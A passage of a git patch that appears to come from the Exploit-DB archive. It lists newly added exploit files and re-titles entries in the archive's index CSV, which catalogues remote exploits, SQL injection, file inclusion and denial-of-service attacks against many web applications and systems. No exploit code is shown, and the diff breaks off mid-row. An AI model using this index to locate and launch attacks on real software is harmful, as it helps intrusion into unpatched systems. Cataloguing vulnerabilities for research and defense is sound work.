From 81eda5a35c615f22af1784003b75ca586a89199c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 22 Mar 2014 04:31:38 +0000 Subject: [PATCH] Updated 03_22_2014 --- files.csv | 460 +++++++++++++++------------ platforms/asp/webapps/32394.txt | 7 + platforms/asp/webapps/32401.txt | 11 + platforms/asp/webapps/32412.txt | 11 + platforms/hardware/remote/32374.txt | 231 ++++++++++++++ platforms/hardware/remote/32390.html | 9 + platforms/hardware/remote/32391.html | 9 + platforms/hardware/webapps/32385.txt | 77 +++++ platforms/linux/dos/32384.txt | 65 ++++ platforms/linux/remote/32277.txt | 21 ++ platforms/multiple/dos/32381.js | 25 ++ platforms/multiple/dos/32386.txt | 18 ++ platforms/multiple/dos/32400.html | 9 + platforms/multiple/remote/32382.txt | 9 + platforms/php/remote/32416.php | 19 ++ platforms/php/remote/32417.php | 12 + platforms/php/webapps/32239.txt | 61 ++++ platforms/php/webapps/32375.txt | 174 ++++++++++ platforms/php/webapps/32383.txt | 9 + platforms/php/webapps/32387.txt | 9 + platforms/php/webapps/32388.txt | 7 + platforms/php/webapps/32389.txt | 9 + platforms/php/webapps/32392.pl | 256 +++++++++++++++ platforms/php/webapps/32395.txt | 9 + platforms/php/webapps/32396.txt | 11 + platforms/php/webapps/32397.txt | 9 + platforms/php/webapps/32398.txt | 9 + platforms/php/webapps/32402.txt | 7 + platforms/php/webapps/32403.txt | 9 + platforms/php/webapps/32404.html | 9 + platforms/php/webapps/32405.txt | 9 + platforms/php/webapps/32406.txt | 9 + platforms/php/webapps/32407.txt | 9 + platforms/php/webapps/32408.txt | 7 + platforms/php/webapps/32409.txt | 9 + platforms/php/webapps/32410.txt | 7 + platforms/php/webapps/32411.txt | 9 + platforms/php/webapps/32413.txt | 7 + platforms/php/webapps/32415.txt | 10 + platforms/solaris/remote/32393.txt | 17 + platforms/unix/remote/32399.txt | 23 ++ 41 files changed, 1487 insertions(+), 210 deletions(-) create mode 100755 platforms/asp/webapps/32394.txt create mode 100755 platforms/asp/webapps/32401.txt create mode 100755 platforms/asp/webapps/32412.txt create mode 100755 platforms/hardware/remote/32374.txt create mode 100755 platforms/hardware/remote/32390.html create mode 100755 platforms/hardware/remote/32391.html create mode 100755 platforms/hardware/webapps/32385.txt create mode 100755 platforms/linux/dos/32384.txt create mode 100755 platforms/linux/remote/32277.txt create mode 100755 platforms/multiple/dos/32381.js create mode 100755 platforms/multiple/dos/32386.txt create mode 100755 platforms/multiple/dos/32400.html create mode 100755 platforms/multiple/remote/32382.txt create mode 100755 platforms/php/remote/32416.php create mode 100755 platforms/php/remote/32417.php create mode 100755 platforms/php/webapps/32239.txt create mode 100755 platforms/php/webapps/32375.txt create mode 100755 platforms/php/webapps/32383.txt create mode 100755 platforms/php/webapps/32387.txt create mode 100755 platforms/php/webapps/32388.txt create mode 100755 platforms/php/webapps/32389.txt create mode 100755 platforms/php/webapps/32392.pl create mode 100755 platforms/php/webapps/32395.txt create mode 100755 platforms/php/webapps/32396.txt create mode 100755 platforms/php/webapps/32397.txt create mode 100755 platforms/php/webapps/32398.txt create mode 100755 platforms/php/webapps/32402.txt create mode 100755 platforms/php/webapps/32403.txt create mode 100755 platforms/php/webapps/32404.html create mode 100755 platforms/php/webapps/32405.txt create mode 100755 platforms/php/webapps/32406.txt create mode 100755 platforms/php/webapps/32407.txt create mode 100755 platforms/php/webapps/32408.txt create mode 100755 platforms/php/webapps/32409.txt create mode 100755 platforms/php/webapps/32410.txt create mode 100755 platforms/php/webapps/32411.txt create mode 100755 platforms/php/webapps/32413.txt create mode 100755 platforms/php/webapps/32415.txt create mode 100755 platforms/solaris/remote/32393.txt create mode 100755 platforms/unix/remote/32399.txt diff --git a/files.csv b/files.csv index 7e1ff696c..c9d06a0db 100755 --- a/files.csv +++ b/files.csv @@ -1,6 +1,6 @@ id,file,description,date,author,platform,type,port -1,platforms/windows/remote/1.c,"MS Windows WebDAV (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80 -2,platforms/windows/remote/2.c,"MS Windows WebDAV Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80 +1,platforms/windows/remote/1.c,"MS Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80 +2,platforms/windows/remote/2.c,"MS Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0 5,platforms/windows/remote/5.c,"MS Windows RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -486,7 +486,7 @@ id,file,description,date,author,platform,type,port 630,platforms/php/webapps/630.pl,"UBB.threads 6.2.x - 6.3x - One Char Bruteforce Exploit",2004-11-15,RusH,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 -635,platforms/php/webapps/635.txt,"miniBB Input Validation Hole in 'user' Parameter",2004-11-16,N/A,php,webapps,0 +635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0 636,platforms/windows/remote/636.c,"MiniShare Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80 637,platforms/windows/remote/637.c,"MailCarrier 2.51 Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25 638,platforms/windows/remote/638.py,"SLMail 5.5 POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110 @@ -508,7 +508,7 @@ id,file,description,date,author,platform,type,port 655,platforms/windows/dos/655.c,"Star Wars Battlefront <= 1.1 Fake Players Denial of Service Exploit",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 Local Root Exploit",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 -659,platforms/cgi/webapps/659.txt,"EZshopper Directory Transversal in loadpage.cgi",2004-11-25,"Zero X",cgi,webapps,0 +659,platforms/cgi/webapps/659.txt,"EZshopper- Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 @@ -640,7 +640,7 @@ id,file,description,date,author,platform,type,port 814,platforms/php/webapps/814.txt,"MercuryBoard <= 1.1.1 Working SQL Injection",2005-02-12,Zeelock,php,webapps,0 815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 816,platforms/linux/local/816.c,"GNU a2ps ""Anything to PostScript"" Local Exploit (not suid)",2005-02-13,lizard,linux,local,0 -817,platforms/cgi/webapps/817.pl,"AwStats <= 6.4 - Denial of Service (with Advisory)",2005-02-14,GHC,cgi,webapps,0 +817,platforms/cgi/webapps/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,webapps,0 818,platforms/php/webapps/818.txt,"vBulletin <= 3.0.4 ""forumdisplay.php"" Code Execution",2005-02-14,AL3NDALEEB,php,webapps,0 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 ""forumdisplay.php"" Code Execution (part 2)",2005-02-15,AL3NDALEEB,php,webapps,0 @@ -1658,7 +1658,7 @@ id,file,description,date,author,platform,type,port 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability",2006-06-24,Persian-Defacer,php,webapps,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) <= 1.1.3 (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 -1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) Remote File Include Vulnerability",2006-06-25,Kw3[R]Ln,php,webapps,0 +1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Include Vulnerability",2006-06-25,Kw3[R]Ln,php,webapps,0 1952,platforms/php/webapps/1952.txt,"THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability",2006-06-25,Kw3[R]Ln,php,webapps,0 1953,platforms/php/webapps/1953.pl,"DeluxeBB <= 1.07 (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1954,platforms/php/webapps/1954.pl,"DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 @@ -1687,7 +1687,7 @@ id,file,description,date,author,platform,type,port 1978,platforms/windows/local/1978.pl,"Microsoft Excel Universal Hlink Local Buffer Overflow Exploit",2006-07-02,"SYS 49152",windows,local,0 1980,platforms/windows/dos/1980.pl,"ImgSvr <= 0.6.5 (long http post) Denial of Service Exploit",2006-07-04,n00b,windows,dos,0 1981,platforms/php/webapps/1981.txt,"galleria Mambo Module <= 1.0b Remote File Include Vulnerability",2006-07-04,sikunYuk,php,webapps,0 -1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0 +1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0 1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability",2006-07-05,Kw3[R]Ln,php,webapps,0 1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0 1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0 @@ -2067,7 +2067,7 @@ id,file,description,date,author,platform,type,port 2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1- (tr) Remote SQL Injection Vulnerability",2006-09-15,"Fix TR",asp,webapps,0 2372,platforms/php/webapps/2372.txt,"BolinOS <= 4.5.5 (gBRootPath) Remote File Include Vulnerability",2006-09-15,"Mehmet Ince",php,webapps,0 2373,platforms/php/webapps/2373.txt,"PHP DocWriter <= 0.3 (script) Remote File Include Exploit",2006-09-15,Kacper,php,webapps,0 -2374,platforms/php/webapps/2374.pl,"Site@School <= 2.4.02 Advisory / Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 +2374,platforms/php/webapps/2374.pl,"Site@School <= 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery <= 1.2.2b (Nuke Addon) Include Vulnerability",2006-09-15,3l3ctric-Cracker,php,webapps,0 2376,platforms/php/webapps/2376.pl,"phpQuiz <= 0.1.2 - Remote SQL Injection / Code Execution Exploit",2006-09-16,simo64,php,webapps,0 2377,platforms/php/webapps/2377.txt,"aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities",2006-09-16,NeXtMaN,php,webapps,0 @@ -4090,7 +4090,7 @@ id,file,description,date,author,platform,type,port 4444,platforms/php/webapps/4444.txt,"Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability",2007-09-22,VerY-SecReT,php,webapps,0 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object (emprint.DLL 6.0.1.0) BOF Exploit",2007-09-23,rgod,windows,remote,0 4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b (config.inc.php _path) Remote File Inclusion Vuln",2007-09-23,ShockShadow,php,webapps,0 -4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment LFI Vulnerability",2007-09-23,"BorN To K!LL",php,webapps,0 +4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - LFI Vulnerability",2007-09-23,"BorN To K!LL",php,webapps,0 4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability",2007-09-23,GoLd_M,php,webapps,0 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - Remote SQL Injection Vulnerability",2007-09-23,IHTeam,php,webapps,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)",2007-09-24,h07,windows,remote,80 @@ -4201,7 +4201,7 @@ id,file,description,date,author,platform,type,port 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability",2007-10-22,GoLd_M,php,webapps,0 4556,platforms/multiple/remote/4556.txt,"LiteSpeed Web Server <= 3.2.3 - Remote Source Code Disclosure Vuln",2007-10-22,Tr3mbl3r,multiple,remote,0 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sphpblog) <= 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0 -4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script (index.php) Local File Inclusion Vulnerability",2007-10-22,"BorN To K!LL",php,webapps,0 +4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script (index.php) 1.0 - Local File Inclusion Vulnerability",2007-10-22,"BorN To K!LL",php,webapps,0 4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox <= 2.0.0.7 - Remote Denial of Service Exploit",2007-10-22,BugReport.IR,multiple,dos,0 4560,platforms/multiple/dos/4560.pl,"DNS Recursion bandwidth amplification Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 @@ -4983,7 +4983,7 @@ id,file,description,date,author,platform,type,port 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC",2008-04-03,shinnai,windows,dos,0 5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability",2008-04-03,S@BUN,php,webapps,0 5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives (id) Remote SQL Injection Vulnerability",2008-04-03,S@BUN,php,webapps,0 -5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability",2008-04-03,Houssamix,php,webapps,0 +5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - Remote SQL Injection Vulnerability",2008-04-03,Houssamix,php,webapps,0 5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability",2008-04-03,Stack,php,webapps,0 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String PoC",2008-04-03,bratax,windows,dos,0 5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit",2008-04-04,qaaz,sco,local,0 @@ -5146,8 +5146,8 @@ id,file,description,date,author,platform,type,port 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection Exploit",2008-04-27,ZAMUT,php,webapps,0 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0 -5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 -5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 +5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 +5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0 @@ -5173,10 +5173,10 @@ id,file,description,date,author,platform,type,port 5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit",2008-05-04,JosS,php,webapps,0 5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia <= 0.2.0 - SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 5542,platforms/php/webapps/5542.txt,"Online Rental Property Script <= 4.5 (pid) SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 -5543,platforms/php/webapps/5543.txt,"Anserv Auction XL (viewfaqs.php cat) SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 +5543,platforms/php/webapps/5543.txt,"Anserv Auction XL (viewfaqs.php cat) - SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend <= 2.0 (file) Remote File Inclusion Vulnerability",2008-05-05,K-159,php,webapps,0 5545,platforms/php/webapps/5545.txt,"Kmita Mail <= 3.0 (file) Remote File Inclusion Vulnerability",2008-05-05,K-159,php,webapps,0 -5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) Remote SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 +5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - Remote SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers DoS Vulnerability",2008-05-05,Nicob,windows,dos,0 5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit Vulnerability",2008-05-05,"Virangar Security",php,webapps,0 @@ -5373,7 +5373,7 @@ id,file,description,date,author,platform,type,port 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns",2008-06-05,shinnai,windows,remote,0 5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 - Remote SQL injection Vulnerability",2008-06-07,His0k4,php,webapps,0 -5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0 +5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 (lfi/xss) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment <= 1.16 - Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 (filename) File Disclosure Vulnerability",2008-06-08,MEEKAAH,php,webapps,0 @@ -5396,7 +5396,7 @@ id,file,description,date,author,platform,type,port 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/sql) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - Remote SQL Injection Vulnerability",2008-06-10,JosS,php,webapps,0 -5776,platforms/php/webapps/5776.txt,"Experts (answer.php) Remote SQL Injection Vulnerability",2008-06-10,"CWH Underground",php,webapps,0 +5776,platforms/php/webapps/5776.txt,"Experts (answer.php) 1.0.0 - Remote SQL Injection Vulnerability",2008-06-10,"CWH Underground",php,webapps,0 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) Remote BOF Exploit",2008-06-10,shinnai,windows,remote,0 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) BOF Exploit (2)",2008-06-10,shinnai,windows,remote,0 5779,platforms/php/webapps/5779.txt,"syndeo cms 2.6.0 (lfi/xss) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 @@ -5517,7 +5517,7 @@ id,file,description,date,author,platform,type,port 5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-22,"CWH Underground",php,webapps,0 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 (reverse shell) Blind SQL Injection Exploit",2008-06-22,"Guido Landi",php,webapps,0 -5899,platforms/php/webapps/5899.txt,"PageSquid CMS (index.php page) Remote SQL Injection Vulnerability",2008-06-22,"CWH Underground",php,webapps,0 +5899,platforms/php/webapps/5899.txt,"PageSquid CMS (index.php page) 0.3 Beta - Remote SQL Injection Vulnerability",2008-06-22,"CWH Underground",php,webapps,0 5900,platforms/php/webapps/5900.txt,"RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability",2008-06-22,"Ghost Hacker",php,webapps,0 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 (plugin_admin.php) Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0 @@ -5554,7 +5554,7 @@ id,file,description,date,author,platform,type,port 5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 (index.php zone) Local File Inclusion Vulnerability",2008-06-25,StAkeR,php,webapps,0 5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script (sb_jokeid) SQL Injection Vulnerability",2008-06-25,"Hussin X",php,webapps,0 5935,platforms/php/webapps/5935.pl,"Mambo Component Articles (artid) Blind SQL Injection Exploit",2008-06-25,"Ded MustD!e",php,webapps,0 -5936,platforms/php/webapps/5936.txt,"Page Manager CMS Remote Arbitrary File Upload Vulnerability",2008-06-25,"CWH Underground",php,webapps,0 +5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Remote Arbitrary File Upload Vulnerability",2008-06-25,"CWH Underground",php,webapps,0 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 (page.php pid) Remote SQL Injection Vulnerability",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability",2008-06-25,His0k4,php,webapps,0 @@ -5599,7 +5599,7 @@ id,file,description,date,author,platform,type,port 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 (hm) Remote File Inclusion Vulnerability",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"php-Agenda 2.2.4 (index.php page) Local File Inclusion Vulnerability",2008-07-01,StAkeR,php,webapps,0 5983,platforms/php/webapps/5983.txt,"CAT2 (spaw_root) Local File Inclusion Vulnerability",2008-07-01,StAkeR,php,webapps,0 -5984,platforms/php/webapps/5984.txt,"Sisplet CMS (index.php id) Remote SQL Injection Vulnerability",2008-07-01,"CWH Underground",php,webapps,0 +5984,platforms/php/webapps/5984.txt,"Sisplet CMS (index.php id) 2008-01-24 - Remote SQL Injection Vulnerability",2008-07-01,"CWH Underground",php,webapps,0 5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 (article_ID) Remote SQL Injection Vulnerability",2008-07-01,"CWH Underground",php,webapps,0 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium <= 7.6.b.5 - Remote Code Execution Exploit",2008-07-01,"Charles Fol",php,webapps,0 5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 (cat_id) Remote SQL Injection Vulnerability",2008-07-01,Kacak,php,webapps,0 @@ -5607,7 +5607,7 @@ id,file,description,date,author,platform,type,port 5989,platforms/php/webapps/5989.txt,"Joomla Component versioning 1.0.2 (id) SQL Injection Vulnerability",2008-07-01,"DarkMatter Crew",php,webapps,0 5990,platforms/php/webapps/5990.txt,"Joomla Component mygallery (cid) Remote SQL Injection Vulnerability",2008-07-01,Houssamix,php,webapps,0 5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability",2008-07-02,haZl0oh,php,webapps,0 -5992,platforms/php/webapps/5992.txt,"CMS little (index.php template) Local File Inclusion Vulnerability",2008-07-02,"CWH Underground",php,webapps,0 +5992,platforms/php/webapps/5992.txt,"CMS little (index.php template) 0.0.1 - Local File Inclusion Vulnerability",2008-07-02,"CWH Underground",php,webapps,0 5993,platforms/php/webapps/5993.txt,"Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability",2008-07-02,His0k4,php,webapps,0 5994,platforms/php/webapps/5994.pl,"Joomla Component QuickTime VR 0.1 - Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 5995,platforms/php/webapps/5995.pl,"Joomla Component is 1.0.1 - Multiple Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 @@ -5658,7 +5658,7 @@ id,file,description,date,author,platform,type,port 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities",2008-10-20,StAkeR,php,webapps,0 6043,platforms/osx/dos/6043.rb,"Core Image Fun House <= 2.0 Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability",2008-07-11,"Hussin X",php,webapps,0 -6045,platforms/linux/remote/6045.py,"trixbox 2.6.1 (langChoice) Remote Root Exploit (py)",2008-07-12,muts,linux,remote,80 +6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (py)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service PoC",2008-07-12,"Mu Security",multiple,dos,0 6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 Insecure Cookie Handling Vulnerability",2008-07-12,Saime,php,webapps,0 6048,platforms/php/webapps/6048.txt,"Maian Events 2.0 Insecure Cookie Handling Vulnerability",2008-07-12,Saime,php,webapps,0 @@ -5670,7 +5670,7 @@ id,file,description,date,author,platform,type,port 6055,platforms/php/webapps/6055.pl,"Joomla Component n-forms 1.01 - Blind SQL Injection Exploit",2008-07-12,"The Moorish",php,webapps,0 6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition (id) Remote SQL Injection Vulnerability",2008-07-12,Mr.SQL,php,webapps,0 6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe (sql/lfi) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 -6058,platforms/php/webapps/6058.txt,"Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability",2008-07-12,"CWH Underground",php,webapps,0 +6058,platforms/php/webapps/6058.txt,"Avlc Forum (vlc_forum.php id) - Remote SQL Injection Vulnerability",2008-07-12,"CWH Underground",php,webapps,0 6059,platforms/windows/dos/6059.pl,"Simple DNS Plus <= 5.0/4.1 - Remote Denial of Service Exploit",2008-07-13,Exodus,windows,dos,0 6060,platforms/php/webapps/6060.php,"fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 6061,platforms/php/webapps/6061.txt,"Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability",2008-07-13,S.W.A.T.,php,webapps,0 @@ -6784,9 +6784,9 @@ id,file,description,date,author,platform,type,port 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Remote Blind SQL Injection Vulnerability (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus <= 